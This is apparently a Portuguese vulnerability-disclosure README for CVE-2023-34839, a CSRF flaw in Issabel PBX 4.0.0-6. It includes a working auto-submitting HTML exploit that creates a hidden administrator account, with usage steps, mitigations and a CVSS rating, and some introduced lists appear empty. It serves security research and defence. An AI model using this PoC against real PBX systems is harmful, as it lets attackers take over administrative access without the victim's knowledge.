
CVE-2023-34839 é uma vulnerabilidade de Cross-Site Request Forgery (CSRF) descoberta no Issabel PBX versão 4.0.0-6, uma plataforma de comunicações unificadas de código aberto amplamente utilizada.
CVE-2023-34839 é uma vulnerabilidade de Cross-Site Request Forgery (CSRF) descoberta no Issabel PBX versão 4.0.0-6, uma plataforma de comunicações unificadas open-source amplamente utilizada. A vulnerabilidade reside no endpoint de gerenciamento de usuários e permite que um atacante remoto não autenticado crie silenciosamente uma nova conta de administrador, enganando um administrador atualmente autenticado para que visite uma página web especialmente criada.
O Issabel PBX 4.0.0-6 não implementa proteções contra CSRF (por exemplo, tokens sincronizadores, atributos de cookie SameSite ou validação dos cabeçalhos Origin / Referer) no endpoint de criação de usuário:
POST /index.php?menu=userlist&action=new
Como a aplicação depende exclusivamente de cookies de sessão para autenticação e não realiza validação de requisições que alteram estado, uma requisição POST forjada enviada de qualquer origem será aceita e processada com todos os privilégios da sessão do administrador conectado.
Causa raiz: Ausência de validação de token anti-CSRF em endpoints administrativos que alteram estado.
Classe de vulnerabilidade: CWE-352 — Cross-Site Request Forgery (CSRF)
| Software | Versão | Status |
|---|---|---|
| Issabel PBX | 4.0.0-6 | Vulnerável ✔ |
Um atacante pode explorar esta vulnerabilidade seguindo estes passos de alto nível:
Nenhuma interação além de uma única visita à página é necessária por parte da vítima.
⚠️ Apenas para fins educacionais e de testes autorizados.
Substitualocalhostpelo nome de host ou endereço IP da instância Issabel PBX alvo.
Se estiver testando contra um endpointhttps://com certificado autoassinado, você deve primeiro visitar a URL alvo no mesmo navegador e aceitar o aviso de certificado; caso contrário, o navegador bloqueará o envio do formulário cross-origin.
<html>
<!-- CSRF Exploit — CVE-2023-34839 -->
<body>
<form action="https://localhost/index.php?menu=userlist&action=new" method="POST">
<input type="hidden" name="save" value="Save" />
<input type="hidden" name="name" value="CSRF" />
<input type="hidden" name="description" value="CSRF Test Account" />
<input type="hidden" name="password1" value="Test@123" />
<input type="hidden" name="password2" value="Test@123" />
<input type="hidden" name="group" value="1" /> <!-- 1 = Administrator -->
<input type="hidden" name="extension" value="" />
<input type="hidden" name="webmailuser" value="" />
<input type="hidden" name="webmaildomain" value="" />
<input type="hidden" name="webmailpassword1" value="" />
<input type="hidden" name="id_user" value="" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
O arquivo de exploit também está disponível neste repositório: CSRF Exploit.html
Acesse a interface web do Issabel PBX e faça login com as credenciais de administrador.

Copie o código HTML do PoC acima e salve-o como um arquivo .html, substituindo localhost pelo nome de host ou endereço IP real da instância Issabel alvo.
O exploit usa campos de formulário ocultos para enviar silenciosamente uma requisição POST de criação de novo usuário para a aplicação. Quando a página carrega, o JavaScript embutido envia o formulário imediatamente, sem nenhuma ação visível do usuário.

Abra o arquivo HTML salvo no mesmo navegador (em uma nova aba) enquanto a sessão do administrador ainda estiver ativa. O formulário será enviado automaticamente imediatamente após o carregamento da página.
Volte ao painel de Gerenciamento de Usuários do Issabel PBX. Uma nova conta de usuário (neste PoC, chamada CSRF) terá sido criada com privilégios totais de Administrador — sem qualquer interação adicional além de abrir a página do exploit.

A exploração bem-sucedida do CVE-2023-34839 permite que um atacante:
Como a conta fraudulenta persiste mesmo após o término da sessão da vítima, o atacante mantém o acesso indefinidamente até que a conta seja descoberta e removida.
Administradores e desenvolvedores do Issabel PBX devem aplicar as seguintes mitigações:
Implemente Tokens Anti-CSRF: Gere um token único, imprevisível e vinculado à sessão para cada formulário que altere estado. Valide o token no servidor antes de processar qualquer requisição POST.
Aplique SameSite=Strict ou SameSite=Lax nos Cookies de Sessão: Isso instrui os navegadores a não enviarem cookies em requisições entre sites, prevenindo efetivamente ataques CSRF clássicos em navegadores modernos.
Valide os Cabeçalhos Origin e Referer: Rejeite requisições cujo cabeçalho Origin ou Referer não corresponda ao domínio esperado da aplicação.
Exija Reautenticação para Ações Sensíveis: Solicite a senha atual do administrador antes de permitir a criação de novas contas de nível administrativo.
Aplique as Últimas Correções de Segurança: Acompanhe a página de lançamentos do Issabel e o repositório oficial para correções relacionadas a este CVE.
Este repositório destina-se estritamente a fins educacionais e pesquisas de segurança autorizadas. As informações e o código de prova de conceito fornecidos aqui devem ser usados apenas contra sistemas que você possua ou para os quais tenha permissão explícita por escrito para testar. O uso não autorizado deste exploit contra sistemas que você não possui é ilegal e pode resultar em processo criminal. O autor não assume nenhuma responsabilidade por qualquer uso indevido das informações contidas neste repositório.
| Campo | Valor |
|---|
| ID do CVE | CVE-2023-34839 |
| Data | 23 de junho de 2023 |
| Pesquisador | Sahil Ojha |
| Fornecedor | Issabel |
| Produto | Issabel PBX |
| Versão | 4.0.0-6 |
| Testado Em | Windows |
| Métrica | Valor |
|---|
| Vetor CVSS v3.1 | AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H |
| Pontuação Base | 8.8 (Alta) |
| Vetor de Ataque | Rede |
| Complexidade de Ataque | Baixa |
| Privilégios Necessários | Nenhum |
| Interação do Usuário | Necessária (visita do administrador) |
| Escopo | Inalterado |
| Confidencialidade | Alta |
| Integridade | Alta |
| Disponibilidade | Alta |